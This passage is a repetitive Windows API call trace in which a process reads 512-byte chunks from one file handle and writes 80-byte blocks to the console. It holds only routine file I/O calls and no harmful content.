GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.084] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.084] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.084] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.084] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.085] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.085] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] GetFileType (hFile=0x4c) returned 0x1 [0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.085] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 
[0107.085] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0107.086] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.086] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] GetFileType (hFile=0x4c) returned 0x1 [0107.086] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.086] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] GetFileType (hFile=0x4c) returned 0x1 [0107.087] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.087] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.089] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.089] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.092] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.092] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.092] GetFileType (hFile=0x4c) returned 0x1 [0107.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.092] GetFileType 
(hFile=0x4c) returned 0x1 [0107.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.092] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.092] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.092] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.093] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.093] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.093] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.093] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, 
lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, 
lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.094] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.094] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.094] GetFileType (hFile=0x4c) returned 0x1 [0107.094] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.095] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.095] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] GetFileType (hFile=0x4c) returned 0x1 [0107.095] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.095] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef9c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26efec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26efec*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26f03c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f03c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26f08c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f08c*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26f0dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f0dc*, lpNumberOfBytesWritten=0x26e130*=0x50, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26f12c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26f12c*, lpNumberOfBytesWritten=0x26e130*=0x20, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.096] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e11c | out: lpNewFilePointer=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=4) returned 0x54 [0107.096] ReadFile (in: hFile=0x54, lpBuffer=0x26ef4c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e13c, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, lpNumberOfBytesRead=0x26e13c*=0x200, lpOverlapped=0x0) returned 1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] GetFileType (hFile=0x4c) returned 0x1 [0107.096] _get_osfhandle (_FileHandle=1) returned 0x4c [0107.096] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef4c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26e130, lpOverlapped=0x0 | out: lpBuffer=0x26ef4c*, 